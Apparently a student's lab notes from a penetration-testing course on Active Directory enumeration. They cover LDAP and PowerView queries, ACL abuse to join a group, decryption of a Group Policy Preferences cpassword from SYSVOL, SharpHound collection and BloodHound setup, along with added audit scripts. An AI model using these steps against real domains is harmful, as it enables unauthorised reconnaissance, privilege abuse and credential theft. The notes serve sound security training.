22. Active Directory Introduction and Enumeration
more about AD: https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview
lab domain: corp.com
lab user: stephanie
2.1. Active Directory - Enumeration Using Legacy Windows Tools
xfreerdp3 /u:stephanie /d:corp.com /v:192.168.202.75 /p:'LegmanTeamBenzoin!!'
use RDP instead of PowerShell Remoting / WinRM because of the double-hop problem: https://posts.slayerlabs.com/double-hop/
net user /domain
net user jeffadmin /domain
net group /domain
net group "Sales Department" /domain
2.2. Enumerating Active Directory using PowerShell and .NET Classes
PowerShell cmdlets such as Get-ADUser (https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-aduser?view=windowsserver2022-ps) are only available once the Remote Server Administration Tools (RSAT) are installed.
LDAP communication with AD is not always straightforward, so we leverage the Active Directory Services Interface (ADSI), a set of COM interfaces, as an LDAP provider.
According to Microsoft's documentation, we need a specific LDAP ADsPath to communicate with the AD service. The LDAP path's prototype looks like this:
LDAP://HostName[:PortNumber][/DistinguishedName]
For HostName we use the Primary Domain Controller (PDC). There can be only one PDC in a domain; to find it, we look for the DC referenced by the PdcRoleOwner property.
Example of a DistinguishedName: CN=Stephanie,CN=Users,DC=corp,DC=com
CN = Common Name, DC = Domain Component
.NET classes
https://learn.microsoft.com/en-us/dotnet/api/ https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain?view=windowsdesktop-7.0
..to find which DC holds the PDC role, call
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
powershell -ep bypass
..get the DN of the domain
([adsi]'').distinguishedName
..build the LDAP connection string from the PDC and the DN
$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"
$LDAP
2.3. Adding Search Functionality to our Script
we use the System.DirectoryServices namespace, more specifically the DirectoryEntry and DirectorySearcher classes
...how to search users and their properties; the samAccountType value 805306368 selects user objects
powershell -ep bypass
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"
$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)
$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
#$dirsearcher.filter="name=jeffadmin"
$result = $dirsearcher.FindAll()
Foreach($obj in $result)
{
    Foreach($prop in $obj.Properties)
    {
        # $prop
        $prop.name
        $prop.memberof
    }
    Write-Host "-------------------------------"
}
... a function to search, saved as function.ps1
function LDAPSearch {
    param (
        [string]$LDAPQuery
    )
    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DistinguishedName = ([adsi]'').distinguishedName
    $DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")
    $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)
    return $DirectorySearcher.FindAll()
}
powershell -ep bypass
Import-Module .\function.ps1
... the group query shows more groups than net.exe, including Print Operators, IIS_IUSRS and others, because it enumerates all AD group objects including Domain Local groups (not just global groups).
LDAPSearch -LDAPQuery "(samAccountType=805306368)"
LDAPSearch -LDAPQuery "(objectclass=group)"
.. show the members of each group, both users and other groups
foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) { $group.properties | select {$_.cn}, {$_.member} }
$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Development Department*))"
$group.properties.member
$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Management Department*))"
$group.properties.member
... find a user and show its properties
$group = LDAPSearch -LDAPQuery "(&(objectCategory=user)(cn=michelle*))"
$group.properties
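The member listing above only shows one level; nested groups appear as DNs and have to be queried again by hand. The following is an added example (not from the original notes) that expands group membership recursively with the same ADSI/DirectorySearcher approach, escaping DNs before putting them in a filter and tracking visited groups so circular nesting cannot loop forever. It assumes a domain-joined host; the function and variable names are ours.

```powershell
# Added example: recursive group membership via System.DirectoryServices.
# Assumes a domain-joined host, like the LDAPSearch function in the notes.
function Get-LdapSearcher {
    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DN  = ([adsi]'').distinguishedName
    $entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DN")
    return New-Object System.DirectoryServices.DirectorySearcher($entry)
}

# Escape characters with special meaning in an LDAP filter (RFC 4515), so a DN or
# group name containing '(' or '*' cannot change the query.
function ConvertTo-LdapFilterValue([string]$Value) {
    $Value = $Value.Replace('\', '\5c').Replace('*', '\2a')
    return $Value.Replace('(', '\28').Replace(')', '\29').Replace("`0", '\00')
}

function Get-NestedGroupMembers {
    param(
        [string]$GroupDN,
        [System.Collections.Generic.HashSet[string]]$Seen = (New-Object 'System.Collections.Generic.HashSet[string]'),
        [int]$Depth = 0
    )
    if (-not $Seen.Add($GroupDN)) { return }   # already visited: stops cycles like A -> B -> A
    $searcher = Get-LdapSearcher
    $searcher.Filter = "(distinguishedName=$(ConvertTo-LdapFilterValue $GroupDN))"
    $group = $searcher.FindOne()
    if ($null -eq $group) { return }
    foreach ($memberDN in $group.Properties['member']) {
        $searcher.Filter = "(distinguishedName=$(ConvertTo-LdapFilterValue $memberDN))"
        $member = $searcher.FindOne()
        if ($null -eq $member) {   # e.g. a foreign security principal from a trusted domain
            [pscustomobject]@{ Depth = $Depth; Type = 'unresolved'; Name = ''; DN = $memberDN }
            continue
        }
        $type = $member.Properties['objectclass'] | Select-Object -Last 1   # most specific class
        [pscustomobject]@{
            Depth = $Depth; Type = $type
            Name  = [string]$member.Properties['samaccountname'][0]; DN = $memberDN
        }
        if ($type -eq 'group') { Get-NestedGroupMembers -GroupDN $memberDN -Seen $Seen -Depth ($Depth + 1) }
    }
}

# Usage: start from the DN of a group, found the same way as in the notes above.
$g = Get-LdapSearcher
$g.Filter = '(&(objectCategory=group)(cn=Management Department))'
Get-NestedGroupMembers -GroupDN ([string]$g.FindOne().Properties['distinguishedname'][0]) | Format-Table -AutoSize
```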
2.4. AD Enumeration with PowerView
PowerView
powershell -ep bypass
Import-Module c:\tools\PowerView.ps1
Get-NetDomain
... show all properties of all users
Get-NetUser
.. only show user names
Get-NetUser | select cn
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetGroup | select cn
Get-NetGroup "Sales Department" | select member
Get-NetGroup "Domain A*"
Get-NetUser fred
3. Manual Enumeration - Expanding our Repertoire
3.1. Enumerating Operating Systems
powershell -ep bypass
Import-Module c:\tools\PowerView.ps1
Get-NetComputer
Get-NetComputer | select operatingsystem,dnshostname
Get-NetComputer | select operatingsystem,operatingsystemversion,dnshostname
3.2. Getting an Overview - Permissions and Logged on Users
powershell -ep bypass
Import-Module c:\tools\PowerView.ps1
.... find other machines where the current user is a local admin
Find-LocalAdminAccess
Get-NetSession -ComputerName files04
Get-NetSession -ComputerName web04
Get-NetSession -ComputerName client74
... if Get-NetSession returns nothing, check the permissions on HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity (newer Windows versions restrict who may enumerate sessions through this key)
Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion
Alternative: the PsLoggedOn application from the Sysinternals Suite shows who is logged on to a host (it relies on the Remote Registry service being enabled on the target).
C:\tools\PSTools\PsLoggedon.exe \\client76
3.3. Enumeration Through Service Principal Names
setspn -L iis_service
powershell -ep bypass
Import-Module c:\tools\PowerView.ps1
Get-NetUser -SPN | select samaccountname,serviceprincipalname
nslookup.exe web04.corp.com
3.4. Enumerating Object Permissions
Permissions on an AD object are stored as Access Control Entries (ACEs); together these ACEs make up the object's Access Control List (ACL).
AD permission types we look for (Microsoft's documentation lists the remaining permissions and describes each in more detail):
GenericAll: full permissions on the object
GenericWrite: edit certain attributes on the object
WriteOwner: change ownership of the object
WriteDACL: edit the ACEs applied to the object
AllExtendedRights: change password, reset password, etc.
ForceChangePassword: password change for the object
Self (Self-Membership): add ourselves to, for example, a group
powershell -ep bypass
Import-Module c:\tools\PowerView.ps1
Get-ObjectAcl -Identity stephanie
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553
Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName
net group "Management Department" stephanie /add /domain
Get-NetGroup "Management Department" | select member
net group "Management Department" stephanie /del /domain
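The Get-ObjectAcl output above has to be filtered and its SIDs translated by hand. This added example (ours, not from the notes or PowerView) reads the same security descriptor through the .NET DirectoryEntry class, keeps only the permission types listed above, resolves SIDs to names and labels the two extended rights the list names. It assumes a domain-joined host; the function name and the object's cn parameter are ours.

```powershell
# Added example: audit the interesting ACEs on one AD object with plain .NET.
# Assumes a domain-joined host; $TargetCn is the object's common name (e.g. a group).
function Get-InterestingObjectAces {
    param([string]$TargetCn)
    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DN  = ([adsi]'').distinguishedName
    $root = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DN")
    # Escape filter metacharacters so the cn cannot alter the LDAP query (RFC 4515)
    $safeCn = [regex]::Replace($TargetCn, '[\\*()]', { param($m) '\' + ('{0:x2}' -f [int][char]$m.Value) })
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root, "(cn=$safeCn)")
    $result = $searcher.FindOne()
    if ($null -eq $result) { throw "object with cn=$TargetCn not found" }
    $entry = $result.GetDirectoryEntry()        # DirectoryEntry exposes the security descriptor

    # Extended-right GUIDs that map to the permissions listed above; others are shown raw
    $extendedRights = @{
        '00299570-246d-11d0-a768-00aa006e0529' = 'ForceChangePassword'
        '00000000-0000-0000-0000-000000000000' = 'AllExtendedRights'
    }
    $wanted = 'GenericAll', 'GenericWrite', 'WriteOwner', 'WriteDacl', 'ExtendedRight', 'Self'
    $rules = $entry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    foreach ($rule in $rules) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        $hit = ($rule.ActiveDirectoryRights.ToString() -split ',\s*') | Where-Object { $wanted -contains $_ }
        if (-not $hit) { continue }
        $sid = $rule.IdentityReference.Value
        try   { $name = $rule.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = $sid }                  # SID that no longer resolves (deleted principal)
        $detail = ''
        if ($hit -contains 'ExtendedRight') {
            $guid = $rule.ObjectType.ToString()
            $detail = if ($extendedRights.ContainsKey($guid)) { $extendedRights[$guid] } else { $guid }
        }
        [pscustomobject]@{
            Principal = $name; SID = $sid; Rights = ($hit -join ','); Detail = $detail; Inherited = $rule.IsInherited
        }
    }
}

Get-InterestingObjectAces -TargetCn 'Management Department' | Format-Table -AutoSize
```

Inherited ACEs usually come from the OU or domain head; an explicit (non-inherited) GenericAll for a regular user account, like the one found above, is the kind of entry worth explaining in a report.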
3.5. Enumerating Domain Shares
powershell -ep bypass
Import-Module c:\tools\PowerView.ps1
... show all shares in the domain
Find-DomainShare
.. show only the shares we have access to
Find-DomainShare -CheckShareAccess
ls \\dc1.corp.com\sysvol\corp.com\
ls \\dc1.corp.com\sysvol\corp.com\Policies
cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml
... the file contains a cpassword value (a Group Policy Preferences password); it can be decrypted because the AES key is published on MSDN, using gpp-decrypt on Kali
gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
..another interesting file
cat \\FILES04\docshare\docs\do-not-share\start-email.txt
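Finding the old-policy-backup.xml above was manual. This added example (not from the original notes) walks the SYSVOL Policies tree and reports every XML file that still carries a cpassword attribute, with the account it belongs to and when the item was last changed, which is the inventory a defender wants before cleaning up. It assumes read access to the share; the path defaults to the lab DC from the notes and the function name is ours.

```powershell
# Added example: inventory Group Policy Preference files with cpassword attributes.
# Assumes read access to SYSVOL; path taken from the notes above.
function Find-GppCpassword {
    param([string]$SysvolPath = '\\dc1.corp.com\sysvol\corp.com\Policies')
    # GPP XML normally lives under Machine\Preferences or User\Preferences, but a backup
    # like old-policy-backup.xml can sit anywhere, so every .xml under Policies is checked.
    Get-ChildItem -Path $SysvolPath -Recurse -Filter '*.xml' -ErrorAction SilentlyContinue |
      ForEach-Object {
        $file = $_.FullName
        try { [xml]$doc = Get-Content -Path $file -Raw -ErrorAction Stop }
        catch { return }                            # unreadable or not well-formed XML: skip
        # cpassword is an attribute on the <Properties> element of the preference item
        foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
            $cp = $node.GetAttribute('cpassword')
            [pscustomobject]@{
                File     = $file
                Item     = $node.ParentNode.LocalName          # User (Groups.xml), Task, Service, ...
                Account  = $node.GetAttribute('userName')
                HasValue = -not [string]::IsNullOrEmpty($cp)   # empty attribute = password already cleared
                Changed  = $node.ParentNode.GetAttribute('changed')
            }
        }
      }
}

Find-GppCpassword | Format-Table -AutoSize
```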
4. Active Directory - Automated Enumeration
4.1. Collecting Data with SharpHound
https://github.com/BloodHoundAD/SharpHound/releases
powershell -ep bypass
Import-Module c:\tools\Sharphound.ps1
Get-Help Invoke-BloodHound
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\users\marcus\documents\ -OutputPrefix "audit"
SharpHound also supports looping: the collector runs cyclical queries of our choosing over a period of time. The collection method used above creates a single snapshot of the domain; running it in a loop may gather additional data as the environment changes. For example, a user who logged on after we collected the snapshot would be missed in our analysis. The cache file speeds up repeated collections.
4.2. Analysing Data using BloodHound
sudo apt install bloodhound
sudo neo4j start
login at url: http://localhost:7474/browser/ username: neo4j / password: neo4j
bloodhound
if bloodhound errors out on first start:
$ bloodhound
It seems it's the first time you run bloodhound
Please run bloodhound-setup first
Do you want to run bloodhound-setup now? [Y/n] y
[*] Starting PostgreSQL service
[*] Creating Database
WARNING: database "postgres" has a collation version mismatch
DETAIL: The database was created using collation version 2.40, but the operating system provides version 2.41.
HINT: Rebuild all objects in this database that use the default collation and run ALTER DATABASE postgres REFRESH COLLATION VERSION, or build PostgreSQL with the right library version.
User _bloodhound already exists in PostgreSQL
WARNING: database "postgres" has a collation version mismatch
DETAIL: The database was created using collation version 2.40, but the operating system provides version 2.41.
HINT: Rebuild all objects in this database that use the default collation and run ALTER DATABASE postgres REFRESH COLLATION VERSION, or build PostgreSQL with the right library version.
Creating database
WARNING: database "postgres" has a collation version mismatch
DETAIL: The database was created using collation version 2.40, but the operating system provides version 2.41.
HINT: Rebuild all objects in this database that use the default collation and run ALTER DATABASE postgres REFRESH COLLATION VERSION, or build PostgreSQL with the right library version.
createdb: error: database creation failed: ERROR: template database "template1" has a collation version mismatch
DETAIL: The template database was created using collation version 2.40, but the operating system provides version 2.41.
HINT: Rebuild all objects in the template database that use the default collation and run ALTER DATABASE template1 REFRESH COLLATION VERSION, or build PostgreSQL with the right library version.
psql: error: connection to server on socket "/var/run/postgresql/.s.PGSQL.5432" failed: FATAL: database "bloodhound" does not exist
$ sudo -u postgres psql -c "ALTER DATABASE template1 REFRESH COLLATION VERSION;"
$ sudo -u postgres psql -c "ALTER DATABASE postgres REFRESH COLLATION VERSION;"
┌──(pentests㉿kali)-[~/beyond/webdav]
└─$ bloodhound
It seems it's the first time you run bloodhound
Please run bloodhound-setup first
Do you want to run bloodhound-setup now? [Y/n]
[*] Starting PostgreSQL service
[*] Creating Database
User _bloodhound already exists in PostgreSQL
Creating database
ALTER ROLE
[*] Starting neo4j
Neo4j is running at pid 341907
[i] You need to change the default password for neo4j
Default credentials are user:neo4j password:neo4j
[!] IMPORTANT: Once you have setup the new password, please update /etc/bhapi/bhapi.json with the new password before running bloodhound
opening http://localhost:7474/